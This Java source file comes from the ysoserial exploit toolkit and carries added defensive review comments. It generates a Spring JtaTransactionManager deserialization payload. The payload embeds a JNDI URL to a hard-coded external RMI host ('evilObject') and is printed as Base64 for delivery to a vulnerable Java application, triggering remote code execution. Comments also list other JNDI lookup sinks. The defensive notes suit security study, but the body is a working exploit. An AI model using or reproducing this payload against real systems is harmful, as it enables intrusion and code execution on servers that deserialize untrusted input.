package ysoserial.exploit.jndi;

import org.springframework.transaction.jta.JtaTransactionManager;
import ysoserial.payloads.annotation.Dependencies;

import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.net.Socket;
import java.util.Base64;

/**
 * @ClassName: JNDIInjection
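 * @Description: Serializes a Spring JtaTransactionManager whose userTransactionName is a JNDI URL. Background reading: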
 * https://www.veracode.com/blog/research/exploiting-jndi-injections-java
 * https://www.iswin.org/2016/01/24/Spring-framework-deserialization-RCE-%E5%88%86%E6%9E%90%E4%BB%A5%E5%8F%8A%E5%88%A9%E7%94%A8/
 * https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE-wp.pdf
 * @Author: angelwhu
 * @Create: 2019/03/06 15:16
 **/
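// NOTE(review): "spring-contex" is presumably a typo for spring-context; the string is kept
// unchanged because the annotation value may be read at runtime.
@Dependencies({"Spring Framework 4.2.4,spring-tx,spring-contex,javax.transaction"})
public class JNDIInjection {
    /**
     * Serializes a {@link JtaTransactionManager} whose {@code userTransactionName} is a JNDI URL
     * and prints the resulting stream, Base64-encoded, to standard output.
     *
     * <p>The references in the file header describe
     * {@code JtaTransactionManager.readObject()} as performing a JNDI lookup of this name when
     * the stream is deserialized, so the lookup target is chosen by whoever produced the stream.
     * Review points for a defender:
     * <ul>
     *   <li>Do not pass untrusted bytes to {@code ObjectInputStream}; where native
     *       serialization cannot be removed, restrict it with an allow-list
     *       {@code ObjectInputFilter}.</li>
     *   <li>Restrict outbound RMI/LDAP connections from application servers, and alert on
     *       lookups to hosts outside the expected naming services.</li>
     *   <li>Base64 text that starts with {@code rO0AB} is a Java serialization stream header;
     *       such a value carrying this class name together with an {@code rmi://} or
     *       {@code ldap://} URL is a useful detection signal.</li>
     * </ul>
     *
     * @throws Exception if the object cannot be serialized
     */
    public static void generatePayload() throws Exception {
        // JNDI lookup address (hard-coded by the original author).
        String jndiAddress = "rmi://39.106.143.48:1389/evilObject";

        // Instantiate the JtaTransactionManager and set its userTransactionName field.
        JtaTransactionManager manager = new JtaTransactionManager();
        manager.setUserTransactionName(jndiAddress);

        ByteArrayOutputStream buffer = new ByteArrayOutputStream();
        // try-with-resources closes (and therefore flushes) the object stream before the
        // buffer is read; the original never closed it.
        try (ObjectOutputStream objOut = new ObjectOutputStream(buffer)) {
            objOut.writeObject(manager);
        }
        System.out.println(Base64.getEncoder().encodeToString(buffer.toByteArray()));

        // Other methods the original author listed next to this one; presumably further JNDI
        // lookup sinks, so candidates for deserialization filters and detection rules:
        //javax.management.remote.rmi.RMIConnector.connect();
        //org.hibernate.jmx.StatisticsService.setSessionFactoryJNDIName
        //com.sun.rowset.JdbcRowSetImpl.execute()
        //org.springframework.transaction.jta.JtaTransactionManager.readObject()
    }

    /**
     * Command-line entry point; delegates to {@link #generatePayload()}.
     *
     * @param args unused
     * @throws Exception propagated from {@link #generatePayload()}
     */
    public static void main(String[] args) throws Exception {
        generatePayload();
    }
}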
